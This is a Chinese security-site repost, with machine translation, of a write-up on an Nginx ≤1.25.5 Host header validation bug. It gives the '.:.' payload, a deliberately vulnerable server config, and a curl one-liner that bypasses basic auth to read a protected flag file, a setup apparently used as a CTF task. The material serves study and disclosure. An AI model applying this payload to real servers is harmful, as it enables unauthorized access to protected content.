标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-3401]   作者: Candy 发表于: [2024-04-26]

本文共 [41] 位读者顶过

Nginx 版本 1.25.5 及更低版本似乎存在主机标头过滤验证错误,可能被用于恶意。

[出自:jiwo.org]


原文:


# Nginx =< 1.25.5 $host variable validation bug
 
## Intro:
 
In the "Host" header sent to Nginx web server you can't just insert a dot or something like that, because a filtering rules exists there.
The ngx_http_validate_host function is responsible for filtering (https://github.com/nginx/nginx/blob/master/src/http/ngx_http_request.c#L2145).
 
## What it validates:
 
+ two dots in a row are not allowed
+ colon and everything after it are stripped off
+ if "Host" header starts with "[", then after "]" everything is deleted
+ path separators are not allowed
+ cannot send chars ≤ 0x20 and == 0x7f
+ if there is a dot at the end, it is removed
+ if after all deletions the host length is zero, error occurs
 
## The bug itself:
 
dot_pos can be greater than host_len, if the last dot is included in the strip, then the last unstripped character (first dot in this case) is not deleted.
 
So, if "Host" header payload is .:. , the colon and dot after it are stripped, but the first dot remains untouched and Nginx $host variable now contains only single dot character, what can't be done in the normal conditions.
 
## Vulnerable Nginx server configuration example:
 
server {
 root /sites/$host;
 index index.html;
 server_name _;
 
 location / {
 try_files $uri $uri/ =404;
 }
}
 
server {
 server_name "";
 
 location / {
 return 418 "I'm a teapot.";
 }
}
 
server {
 root /sites/protected-host.example.com;
 index flag.html;
 server_name protected-host.example.com;
 auth_basic "Protected File Storage";
 auth_basic_user_file /.htpasswd;
 
 location / {
 try_files $uri $uri/ =404;
 }
}
 
## Exploit (unauthorized access to password-protected host in this case):
 
 
P.S.
The bug was sent to security-alert@nginx.org, but the Nginx dev team said that ngx_http_validate_host function is a filter against fools and not a security bug at all, so it was decided to make it as a task on CTF Tinkoff contest.
 


机翻:

#Nginx=<1.25.5$主机变量验证错误
 
##简介:
 
在发送到Nginx web服务器的“主机”标题中,你不能只插入一个点或类似的东西,因为那里存在过滤规则。
ngx_http_validate_host函数负责过滤(https://github.com/nginx/nginx/blob/master/src/http/ngx_http_request.c#L2145).
 
##它验证的内容:
 
+ 不允许一行有两个点
+结肠及其剥离后的一切
+ 如果“Host”标头以“[”开头,则在“]”之后删除所有内容
+ 不允许使用路径分隔符
+ 无法发送字符≤0x20且==0x7f
+ 如果末端有一个点,则将其删除
+ 如果在所有删除之后主机长度为零,则会发生错误
 
##错误本身:
 
dot_pos可以大于host_len,如果最后一个点包含在条带中,则不会删除最后一个未拆分的字符(本例中为第一个点)。
 
因此,如果“Host”标头有效载荷为.:,冒号和后面的点被剥离,但第一个点保持不变,Nginx$主机变量现在只包含一个点字符,这在正常情况下是无法做到的。
 
##易受攻击的Nginx服务器配置示例:


 
server {
 root /sites/$host;
 index index.html;
 server_name _;
 
 location / {
 try_files $uri $uri/ =404;
 }
}
 
server {
 server_name "";
 
 location / {
 return 418 "I'm a teapot.";
 }
}
 
server {
 root /sites/protected-host.example.com;
 index flag.html;
 server_name protected-host.example.com;
 auth_basic "Protected File Storage";
 auth_basic_user_file /.htpasswd;
 
 location / {
 try_files $uri $uri/ =404;
 }
}

 

##利用漏洞(在这种情况下,未经授权访问受密码保护的主机):


curl -H "Host: .:." http://protected-host.example.com/protected-host.example.com/flag.html


附笔。
错误已发送到security-alert@nginx.org,但Nginx开发团队表示,ngx_http_validate_host函数是一个针对傻瓜的过滤器,而不是一个安全漏洞,因此决定将其作为CTF Tinkoff竞赛的一项任务。


评论

暂无
发表评论
 返回顶部 
热度(41)
 关注微信